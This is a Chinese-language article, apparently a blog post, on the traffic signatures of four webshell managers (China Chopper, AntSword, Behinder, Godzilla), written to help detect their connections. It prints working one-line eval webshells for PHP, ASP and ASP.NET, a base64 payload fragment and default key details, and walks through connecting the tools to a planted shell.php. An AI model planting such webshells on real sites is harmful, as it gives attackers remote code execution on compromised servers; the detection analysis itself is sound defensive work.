webshell管理工具及其流量特征分析
——
对常见四款webshell进行分析,对工具连接流量有个基本认识。
——
中国菜刀(Chopper)流量特征
是一款经典的网站管理工具,有文件管理、数据库管理、虚拟终端等功能。
流量特征十分明显,如今安全设备基本可以识别到菜刀的流量。基本是在安全教学中使用。
github项目地址:https://github.com/raddyfiy/caidao-official-version
菜刀使用的webshell ,特征十分明显
常见一句话(Eval):
PHP一句话:
<?php @eval($_POST['caidao']);?>
ASP一句话:
<%eval request(“caidao”)%>
asp.net一句话:
<%@ Page Language=“Jscript”%><%eval(Request.Item[“caidao”],“unsafe”);%>
请求体中传递的payload为base64编码,并且存在固定的
为
QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7J
响应文的格式为
X@Y
结果
X@Y
——
——
蚁剑流量特征
AntSword(蚁剑)是一个开放源代码,跨平台的网站管理工具,旨在满足渗透测试人员以及具有权限和/或授权的安全研究人员以及网站管理员的需求。
github项目地址: https://github.com/AntSwordProject/antSword
蚁剑的核心代码是由菜刀修改而来的,所有普通的一句话木马也可以使用。
用burp 挂上蚁剑的代理。
进行操作时,burp 中能够看到所有的数据包。
点开一个数据包,这里可以看到路径 /shell.php 是通过蚁剑连接的这个一句话木马进行的操作。
每个请求体都存在 @ini_set(“display_errors”, “0”);@set_time_limit(0) 开头
并且存在 base64_decode 等字符。
在返回包中,响应结果的返回格式为随机数、结果、随机数。
——
——
冰蝎
是一款动态二进制加密网站管理客户端。
github地址:https://github.com/rebeyond/Behinder
在冰蝎文件夹中,sever 文件中存放了各种类型的木马文件。
冰蝎连接webshell ,最简单的一句话木马是用不了了,就会出现如图这样的情况。
——
冰蝎2.0 版本的流量特征
设置代理,并在burp上也设置好这个端口的代理。
连接2.0版本给定shell.php木马文件
2.0中采用协商密钥机制。第一阶段请求中返回包状态码为200,响应包返回内容必定是16位的密钥
请求体中:
Accept: text/html, image/gif, image/jpeg, *; q=.2, /; q=.2
建立连接后 所有请求 Cookie的格式都为: Cookie: PHPSESSID=; path=/;
——
冰蝎3.0 webshell 流量特征
去除了动态密钥协商机制,采用预共享密钥,全程无明文交互,密钥格式为md5(“admin”)[0:16],即"admin"的md5值的前十六位字符。
所以在各种语言的webshell中都会存在16位数的连接密码,默认变量为key。
这里看一个冰蝎3.0版本php语言的shell ,会判断是否开启openssl采用不同的加密算法,在代码中同样会存在eval或assert等字符特征
连接server文件夹中给定shell.php木马文件
每一个请求头中存在
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
每一个响应包中都存在
Pragma: no-cache
Cache-Control: no-cache
——
——
哥斯拉流量特征
哥斯拉继菜刀、蚁剑、冰蝎之后具有更多优点的Webshell管理工具
github地址:https://github.com/BeichenDream/Godzilla
哥斯拉的webshell需要动态生成,可以根据需求选择各种不同的加密方式
先点击管理-生成,这里演示php 的webshell。
点击生成之后,要把文件进行保存,我这里直接放在phpstudy目录下。
可以看到生成的webshell 代码就是普通的php一句话木马。
在哥斯拉中,生成的木马文件代码中,
jsp会出现xc,pass字符和Java反射(ClassLoader,getClass().getClassLoader()),base64加解码等特征
php,asp则为普通的一句话木马
点击目标-新增 ,设置生成的webshell文件的路径,有效载荷和加密器都选择前面生成木马文件时的选项。
然后代理可选择,默认是无代理,我这里选择代理在了burp 上,方便分析流量特征。
所有请求中Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
所有请求中Cookie中后面都存在 ; (分号)
所有响应中Cache-Control: no-store, no-cache, must-revalidate,
347
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
